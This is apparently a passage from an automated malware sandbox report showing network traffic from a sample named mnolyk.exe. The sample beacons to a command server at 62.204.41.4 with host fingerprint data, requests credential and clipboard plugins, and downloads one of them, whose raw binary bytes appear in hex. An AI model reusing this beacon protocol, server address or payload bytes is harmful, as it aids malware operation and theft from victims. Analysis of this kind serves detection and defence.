                                                        Feb 6, 2023 14:19:23.540966988 CET5026780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:23.542501926 CET805026862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:23.542656898 CET5026880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:23.543087006 CET5026880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:23.604387999 CET805026862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:23.607664108 CET805026862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:23.607737064 CET5026880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:23.715068102 CET5026880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:23.716726065 CET5026980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:23.776777983 CET805026862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:23.776998997 CET805026962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:23.777193069 CET5026880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:23.777405977 CET5026980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:23.777740955 CET5026980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:23.838337898 CET805026962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:23.841481924 CET805026962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:23.842619896 CET5026980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:23.949439049 CET5026980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:23.950215101 CET5027080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.009900093 CET805026962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:24.010601997 CET805027062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:24.010745049 CET5026980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.010808945 CET5027080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.011353970 CET5027080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.072000027 CET805027062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:24.077202082 CET805027062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:24.078553915 CET5027080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.183182001 CET5027080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.183859110 CET5027180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.244060040 CET805027062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:24.244163990 CET805027162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:24.244424105 CET5027180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.244437933 CET5027080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.244810104 CET5027180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.305227041 CET805027162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:24.308454037 CET805027162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:24.310844898 CET5027180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.417618990 CET5027180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.418276072 CET5027280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.478272915 CET805027162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:24.478820086 CET805027262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:24.478961945 CET5027180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.479007006 CET5027280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.480079889 CET5027280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.546174049 CET805027262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:24.546220064 CET805027262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:24.546386003 CET5027280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.655590057 CET5027280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.656286001 CET5027380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.718983889 CET805027262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:24.719170094 CET5027280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.720848083 CET805027362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:24.720982075 CET5027380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.721440077 CET5027380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.783724070 CET805027362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:24.788153887 CET805027362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:24.788292885 CET5027380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.902209044 CET5027380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.903290033 CET5027480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.964562893 CET805027362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:24.964725971 CET5027380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.965740919 CET805027462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:24.965862989 CET5027480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:24.966329098 CET5027480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:25.028808117 CET805027462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:25.033452988 CET805027462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:25.033613920 CET5027480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:25.153373957 CET5027480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:25.154043913 CET5027580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:25.215636015 CET805027562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:25.215771914 CET5027580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:25.215990067 CET805027462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:25.216067076 CET5027480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:25.216519117 CET5027580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:25.278135061 CET805027562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:25.282788038 CET805027562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:25.282929897 CET5027580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:25.386830091 CET5027580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:25.388304949 CET5027680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:25.448720932 CET805027562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:25.448779106 CET5027580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:25.450535059 CET805027662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:25.452774048 CET5027680192.168.2.562.204.41.4
                                                        • 62.204.41.4
                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.54969162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:28.832691908 CET104OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:28.896934986 CET105INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.54969062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:28.837604046 CET104OUTGET /Gol478Ns/Plugins/cred64.dll HTTP/1.1
                                                        Host: 62.204.41.4
                                                        Feb 6, 2023 14:16:28.898228884 CET105INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:28 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 162
                                                        Connection: keep-alive
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                                                        Feb 6, 2023 14:16:28.917882919 CET105OUTGET /Gol478Ns/Plugins/clip64.dll HTTP/1.1
                                                        Host: 62.204.41.4
                                                        Feb 6, 2023 14:16:28.979448080 CET107INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:28 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 91136
                                                        Last-Modified: Fri, 03 Feb 2023 17:19:21 GMT
                                                        Connection: keep-alive
                                                        ETag: "63dd4219-16400"
                                                        Accept-Ranges: bytes
                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 18 8f 2c 43 79 e1 7f 43 79 e1 7f 43 79 e1 7f 18 11 e2 7e 49 79 e1 7f 18 11 e4 7e cb 79 e1 7f 18 11 e5 7e 51 79 e1 7f 96 14 e5 7e 4c 79 e1 7f 96 14 e2 7e 52 79 e1 7f 96 14 e4 7e 62 79 e1 7f 18 11 e0 7e 46 79 e1 7f 43 79 e0 7f 19 79 e1 7f d8 17 e8 7e 40 79 e1 7f d8 17 e1 7e 42 79 e1 7f d8 17 1e 7f 42 79 e1 7f d8 17 e3 7e 42 79 e1 7f 52 69 63 68 43 79 e1 7f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 38 dd 63 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 de 00 00 00 8c 00 00 00 00 00 00 00 3e 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4a 01 00 9c 00 00 00 3c 4b 01 00 3c 00 00 00 00 80 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 54 10 00 00 20 3f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 14 00 00 00 60 01 00 00 0c 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 80 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 10 00 00 00 90 01 00 00 12 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$,CyCyCy~Iy~y~Qy~Ly~Ry~by~FyCyy~@y~ByBy~ByRichCyPEL8c!>@J<K<T ?p?@,.textV `.rdataab@@.dataD`D@.rsrcP@@.relocTR@B
                                                        Feb 6, 2023 14:16:28.979521990 CET108INData Raw: 00 00 00 00 6a 20 68 a8 3c 01 10 b9 70 68 01 10 e8 3f 23 00 00 68 00 ea 00 10 e8 8c 2a 00 00 59 c3 cc cc cc 6a 38 68 cc 3c 01 10 b9 88 68 01 10 e8 1f 23 00 00 68 60 ea 00 10 e8 6c 2a 00 00 59 c3 cc cc cc 6a 38 68 cc 3c 01 10 b9 a0 68 01 10 e8 ff
                                                        Data Ascii: j h<ph?#h*Yj8h<h#h`l*Yj8h<h"hL*Yj8h<h"h ,*Yj8h=h"h*Yj0hD=h"h)Yj0hx=i"h@)Yhh=i
                                                        Feb 6, 2023 14:16:28.979547977 CET109INData Raw: 7d f0 10 8d 45 dc 0f 43 45 dc 0f be 04 18 8b 04 81 83 f8 ff 74 27 c1 e6 06 03 f0 83 c7 06 78 18 8b cf 8b c6 d3 f8 8b 4d f4 50 e8 1f 1b 00 00 8b 55 ec 83 ef 08 8b 4d f8 43 3b da 72 c2 8b 45 f8 85 c0 74 0e 68 00 04 00 00 50 e8 f0 21 00 00 83 c4 08
                                                        Data Ascii: }ECEt'xMPUMC;rEthP!Ur(MBrI#+wVRQ!UEEEr(MBrI#+wRQ~!E_^[]GU4E0SVW3E
                                                        Feb 6, 2023 14:16:28.979572058 CET111INData Raw: 23 52 51 e8 31 1d 00 00 83 c4 08 33 f6 e9 74 ff ff ff 52 51 e8 20 1d 00 00 83 c4 08 5f 8b c6 5e 8b e5 5d c3 e8 3f 43 00 00 e8 4a 1a 00 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 18 8b 55 1c 8b 4d 08 56 85 c0 0f 84 82 00 00 00 53 40 57 50
                                                        Data Ascii: #RQ13tRQ _^]?CJUQEUMVS@WP] M}CM+IDuNFu+FVjVSWP5WjWj UM_[^r%BrI#+wRQ
                                                        Feb 6, 2023 14:16:28.979619026 CET112INData Raw: 10 72 2d 8b 4c 24 40 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 f8 10 00 00 52 51 e8 06 18 00 00 83 c4 08 8b 0d e4 68 01 10 83 f9 10 72 2e a1 d0 68 01 10 41 81 f9 00 10 00 00 72 16 8b 50 fc 83 c1 23 2b c2 83
                                                        Data Ascii: r-L$@BrI#+RQhr.hArP#+QPD$`hhL$Dh~D$tfhQT$DL$dT$Xr-L$@BrI#+PRQ^hr.hArP
                                                        Feb 6, 2023 14:16:28.979794979 CET114INData Raw: 00 00 8a 41 02 3a 42 02 75 0f 83 7c 24 1c ff 74 7b 8a 41 03 3a 42 03 74 73 83 ff 25 73 6e 83 ce 02 c7 44 24 50 00 00 00 00 b9 01 00 00 00 89 74 24 18 3b f9 c7 44 24 54 0f 00 00 00 8d 44 24 20 c6 44 24 40 00 0f 42 cf 83 7c 24 34 10 51 0f 43 44 24
                                                        Data Ascii: A:Bu|$t{A:Bts%snD$Pt$;D$TD$ D$@B|$4QCD$$L$DPT$TD$@L$@C|$Pu81u|$0D$|$0L$@T$TD$D$t9D$r-BrI#+LRQZD$ T$tD$r-L$`B
                                                        Feb 6, 2023 14:16:28.979820967 CET115INData Raw: 6c 8b c7 83 e8 04 89 44 24 1c 72 19 8b 01 3b 02 75 1c 8b 44 24 1c 83 c1 04 83 c2 04 83 e8 04 89 44 24 1c 73 e7 83 f8 fc 0f 84 bd 00 00 00 8a 01 3a 02 75 39 83 7c 24 1c fd 0f 84 ac 00 00 00 8a 41 01 3a 42 01 75 26 83 7c 24 1c fe 0f 84 99 00 00 00
                                                        Data Ascii: lD$r;uD$D$s:u9|$A:Bu&|$A:Bu|$A:Bt~GwvD$Pt$;D$TD$ D$@B|$4QCD$$L$DPT$TD$@L$@C|$Pu0xf90u|$0D$|$0L$@T$T
                                                        Feb 6, 2023 14:16:28.979856014 CET116INData Raw: fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 f1 01 00 00 52 51 e8 ff 08 00 00 83 c4 08 80 7c 24 17 00 74 17 83 ec 18 8b cc 68 00 69 01 10 e8 35 04 00 00 e8 e0 eb ff ff 83 c4 18 8b 74 24 18 83 ec 18 8b cc 81 ce 00 10 00 00
                                                        Data Ascii: rI#+RQ|$thi5t$t$0hiL$xWxr|$4L$ CL$ ;xudD$r;uD$D$s:u1|$A:Bu|$tzA:Bu|$tkA:Btc_u^
                                                        Feb 6, 2023 14:16:28.979882002 CET118INData Raw: 0e 50 57 51 e8 41 1d 00 00 8b 45 08 83 c4 0c 89 46 10 8b c6 89 5e 14 5f 5e 5b 5d c2 04 00 e8 97 de ff ff e8 22 2a 00 00 cc cc 55 8b ec 51 53 56 8b f1 57 8b 7d 0c 8b 4e 14 89 4d fc 3b f9 77 28 8b de 83 f9 10 72 02 8b 1e 57 ff 75 08 89 7e 10 53 e8
                                                        Data Ascii: PWQAEF^_^[]"*UQSVW}NM;w(rWu~S";_^[]v+;v;BC=r%H#;QtwA#HtPm3WuEP~^
                                                        Feb 6, 2023 14:16:28.979907036 CET119INData Raw: 00 50 e8 bc 2e 00 00 59 85 c0 74 03 32 c0 c3 e8 a2 30 00 00 b0 01 c3 6a 00 e8 d0 00 00 00 84 c0 59 0f 95 c0 c3 e8 cc 0c 00 00 84 c0 75 03 32 c0 c3 e8 0c 35 00 00 84 c0 75 07 e8 c2 0c 00 00 eb ed b0 01 c3 e8 04 35 00 00 e8 b3 0c 00 00 b0 01 c3 55
                                                        Data Ascii: P.Yt20jYu25u5Uu}uuMPu,Uuu'YY]cth,j3Y!+*j4YnU}u(jOu2]T4uj%Y]U=
                                                        Feb 6, 2023 14:16:29.046888113 CET121INData Raw: 00 00 00 53 57 ff 75 08 e8 b1 f8 ff ff 8b f0 89 75 e4 83 ff 01 75 22 85 f6 75 1e 53 50 ff 75 08 e8 99 f8 ff ff 53 56 ff 75 08 e8 64 fd ff ff 53 56 ff 75 08 e8 6a 00 00 00 85 ff 74 05 83 ff 03 75 48 53 57 ff 75 08 e8 47 fd ff ff 8b f0 89 75 e4 85
                                                        Data Ascii: SWuuu"uSPuSVudSVujtuHSWuGut5SWuD$MQ0h:uuue3uEMdY_^[UV5u3@uuu,^]U}uuuu]


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        10192.168.2.54970062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:31.043766975 CET210OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:31.124840975 CET211INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        100192.168.2.54979062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:11.646769047 CET301OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:11.715131998 CET302INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        101192.168.2.54979162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:11.901330948 CET302OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:11.967792034 CET303INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        102192.168.2.54979262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:12.357233047 CET303OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:12.424122095 CET304INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        103192.168.2.54979362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:12.843597889 CET304OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:12.909478903 CET305INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        104192.168.2.54979462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:14.531024933 CET305OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
